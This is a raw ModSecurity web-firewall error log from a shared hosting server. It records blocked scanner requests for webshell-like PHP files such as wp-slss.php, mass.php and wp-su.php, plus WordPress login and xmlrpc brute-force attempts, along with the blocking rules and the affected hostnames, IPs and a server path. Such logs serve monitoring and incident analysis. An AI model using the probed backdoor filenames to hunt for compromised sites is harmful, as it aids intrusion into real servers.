[Tue May 26 18:06:08.953990 2026] [security2:error] [pid 960743:tid 960829] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-slss.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-TwAAiVU"]
[Tue May 26 18:06:08.954257 2026] [security2:error] [pid 960743:tid 960877] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-slss.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-TwAAiVU"]
[Tue May 26 18:06:09.015275 2026] [security2:error] [pid 960743:tid 960887] [client 185.192.70.93:50177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/assets/index.php"] [unique_id "ahWTufQvEln_BHBy2zJ-UQAAAJM"]
[Tue May 26 18:06:09.078606 2026] [security2:error] [pid 960743:tid 960875] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-RAAAAIc"]
[Tue May 26 18:06:09.177142 2026] [security2:error] [pid 960743:tid 960836] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/crgio.php"] [unique_id "ahWTufQvEln_BHBy2zJ-WAAAjVw"]
[Tue May 26 18:06:09.177356 2026] [security2:error] [pid 960743:tid 960881] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/crgio.php"] [unique_id "ahWTufQvEln_BHBy2zJ-WAAAjVw"]
[Tue May 26 18:06:09.367227 2026] [security2:error] [pid 960743:tid 960827] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/Okxob.php"] [unique_id "ahWTufQvEln_BHBy2zJ-WQAA_FM"]
[Tue May 26 18:06:09.367448 2026] [security2:error] [pid 960743:tid 960992] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/Okxob.php"] [unique_id "ahWTufQvEln_BHBy2zJ-WQAA_FM"]
[Tue May 26 18:06:10.412819 2026] [security2:error] [pid 960743:tid 960835] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/mass.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-dwAAu1s"]
[Tue May 26 18:06:10.413001 2026] [security2:error] [pid 960743:tid 960927] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/mass.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-dwAAu1s"]
[Tue May 26 18:06:10.572165 2026] [security2:error] [pid 960743:tid 960988] [client 185.192.70.77:50387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/pki-validation/index.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-fgAAAPg"]
[Tue May 26 18:06:10.669667 2026] [security2:error] [pid 960743:tid 960838] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/dropdown.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-gwAA0l4"]
[Tue May 26 18:06:10.669859 2026] [security2:error] [pid 960743:tid 960950] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/dropdown.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-gwAA0l4"]
[Tue May 26 18:06:11.180959 2026] [security2:error] [pid 960743:tid 960887] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTuvQvEln_BHBy2zJ-hgAAAJM"]
[Tue May 26 18:06:11.628665 2026] [security2:error] [pid 960743:tid 960837] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-good.php"] [unique_id "ahWTu_QvEln_BHBy2zJ-lQAA4l0"]
[Tue May 26 18:06:11.628846 2026] [security2:error] [pid 960743:tid 960966] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-good.php"] [unique_id "ahWTu_QvEln_BHBy2zJ-lQAA4l0"]
[Tue May 26 18:06:11.816640 2026] [security2:error] [pid 960743:tid 960840] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/mifta.php"] [unique_id "ahWTu_QvEln_BHBy2zJ-ngAAy2A"]
[Tue May 26 18:06:11.816821 2026] [security2:error] [pid 960743:tid 960943] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/mifta.php"] [unique_id "ahWTu_QvEln_BHBy2zJ-ngAAy2A"]
[Tue May 26 18:06:12.017333 2026] [security2:error] [pid 960743:tid 960841] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/amxloxxr.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-ogAAmGE"]
[Tue May 26 18:06:12.017475 2026] [security2:error] [pid 960743:tid 960892] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/amxloxxr.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-ogAAmGE"]
[Tue May 26 18:06:12.231446 2026] [security2:error] [pid 960743:tid 960761] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/file59.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-rQAA1hE"]
[Tue May 26 18:06:12.231682 2026] [security2:error] [pid 960743:tid 960954] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/file59.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-rQAA1hE"]
[Tue May 26 18:06:12.478738 2026] [security2:error] [pid 960743:tid 960763] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/asasx.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-twAAhxM"]
[Tue May 26 18:06:12.478934 2026] [security2:error] [pid 960743:tid 960875] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/asasx.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-twAAhxM"]
[Tue May 26 18:06:12.489407 2026] [security2:error] [pid 960743:tid 960762] [remote 46.101.217.74:38038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.101.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-qQAArxI"]
[Tue May 26 18:06:12.669541 2026] [security2:error] [pid 960743:tid 960922] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-uAAAALY"]
[Tue May 26 18:06:12.675048 2026] [security2:error] [pid 960743:tid 960768] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-vAAAjhg"]
[Tue May 26 18:06:12.675252 2026] [security2:error] [pid 960743:tid 960882] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-vAAAjhg"]
[Tue May 26 18:06:12.870570 2026] [security2:error] [pid 960743:tid 960770] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ms-edit.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-yQAAyRo"]
[Tue May 26 18:06:12.870751 2026] [security2:error] [pid 960743:tid 960941] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ms-edit.php"] [unique_id "ahWTvPQvEln_BHBy2zJ-yQAAyRo"]
[Tue May 26 18:06:13.060799 2026] [security2:error] [pid 960743:tid 960845] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/file4.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-ywABAWU"]
[Tue May 26 18:06:13.061068 2026] [security2:error] [pid 960743:tid 960997] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/file4.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-ywABAWU"]
[Tue May 26 18:06:13.196423 2026] [security2:error] [pid 960743:tid 960883] [client 185.192.70.90:34719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-0AAAAI8"]
[Tue May 26 18:06:13.250679 2026] [security2:error] [pid 960743:tid 960842] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/hplfuns.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-0gAApWI"]
[Tue May 26 18:06:13.250884 2026] [security2:error] [pid 960743:tid 960905] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/hplfuns.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-0gAApWI"]
[Tue May 26 18:06:13.639356 2026] [security2:error] [pid 960743:tid 960885] [client 82.76.238.33:50643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-2gAAAJE"]
[Tue May 26 18:06:13.639467 2026] [security2:error] [pid 960743:tid 960885] [client 82.76.238.33:50643] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-2gAAAJE"]
[Tue May 26 18:06:13.742016 2026] [security2:error] [pid 960743:tid 960773] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/1index.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-3wAA1x0"]
[Tue May 26 18:06:13.742240 2026] [security2:error] [pid 960743:tid 960955] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/1index.php"] [unique_id "ahWTvfQvEln_BHBy2zJ-3wAA1x0"]
[Tue May 26 18:06:14.348179 2026] [security2:error] [pid 960743:tid 960798] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-su.php"] [unique_id "ahWTvvQvEln_BHBy2zJ-8wAAvjY"]
[Tue May 26 18:06:14.348993 2026] [security2:error] [pid 960743:tid 960930] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-su.php"] [unique_id "ahWTvvQvEln_BHBy2zJ-8wAAvjY"]
[Tue May 26 18:06:14.490612 2026] [security2:error] [pid 960743:tid 960766] [remote 74.7.241.58:33976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWTvvQvEln_BHBy2zJ--QAAiRY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:06:14.553221 2026] [security2:error] [pid 960743:tid 960774] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ccou.php"] [unique_id "ahWTvvQvEln_BHBy2zJ--gAA2x4"]
[Tue May 26 18:06:14.553451 2026] [security2:error] [pid 960743:tid 960959] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ccou.php"] [unique_id "ahWTvvQvEln_BHBy2zJ--gAA2x4"]
[Tue May 26 18:06:14.740557 2026] [security2:error] [pid 960743:tid 960791] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-ver.php"] [unique_id "ahWTvvQvEln_BHBy2zJ_CAAAwi8"]
[Tue May 26 18:06:14.740767 2026] [security2:error] [pid 960743:tid 960934] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-ver.php"] [unique_id "ahWTvvQvEln_BHBy2zJ_CAAAwi8"]
[Tue May 26 18:06:14.789341 2026] [security2:error] [pid 960743:tid 960936] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTvvQvEln_BHBy2zJ-8gAAAMQ"]
[Tue May 26 18:06:14.939416 2026] [security2:error] [pid 960743:tid 960786] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/db.php"] [unique_id "ahWTvvQvEln_BHBy2zJ_DwABAio"]
[Tue May 26 18:06:14.939643 2026] [security2:error] [pid 960743:tid 960998] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/db.php"] [unique_id "ahWTvvQvEln_BHBy2zJ_DwABAio"]
[Tue May 26 18:06:15.148129 2026] [security2:error] [pid 960743:tid 960789] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/lib.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_EQAA8C0"]
[Tue May 26 18:06:15.148296 2026] [security2:error] [pid 960743:tid 960980] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/lib.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_EQAA8C0"]
[Tue May 26 18:06:15.471608 2026] [security2:error] [pid 960743:tid 960780] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/sys.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_HQAAzSQ"]
[Tue May 26 18:06:15.471804 2026] [security2:error] [pid 960743:tid 960945] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/sys.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_HQAAzSQ"]
[Tue May 26 18:06:15.661521 2026] [security2:error] [pid 960743:tid 960792] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/lala.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_IQAA-zA"]
[Tue May 26 18:06:15.661693 2026] [security2:error] [pid 960743:tid 960991] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/lala.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_IQAA-zA"]
[Tue May 26 18:06:15.851236 2026] [security2:error] [pid 960743:tid 960782] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/bthil.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_JgAA7iY"]
[Tue May 26 18:06:15.851445 2026] [security2:error] [pid 960743:tid 960978] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/bthil.php"] [unique_id "ahWTv_QvEln_BHBy2zJ_JgAA7iY"]
[Tue May 26 18:06:16.083643 2026] [security2:error] [pid 960743:tid 960807] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/fun.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_MwAAiT8"]
[Tue May 26 18:06:16.083831 2026] [security2:error] [pid 960743:tid 960877] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/fun.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_MwAAiT8"]
[Tue May 26 18:06:16.309900 2026] [security2:error] [pid 960743:tid 960793] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-the.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_NwAAwzE"]
[Tue May 26 18:06:16.310090 2026] [security2:error] [pid 960743:tid 960935] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-the.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_NwAAwzE"]
[Tue May 26 18:06:16.841455 2026] [security2:error] [pid 960743:tid 960948] [client 185.192.70.78:30527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/css/admin.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_SgAAANA"]
[Tue May 26 18:06:16.901785 2026] [security2:error] [pid 960743:tid 960778] [remote 123.30.233.13:50634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_SQAAvSI"]
[Tue May 26 18:06:16.948670 2026] [security2:error] [pid 960743:tid 960936] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTwPQvEln_BHBy2zJ_QQAAAMQ"]
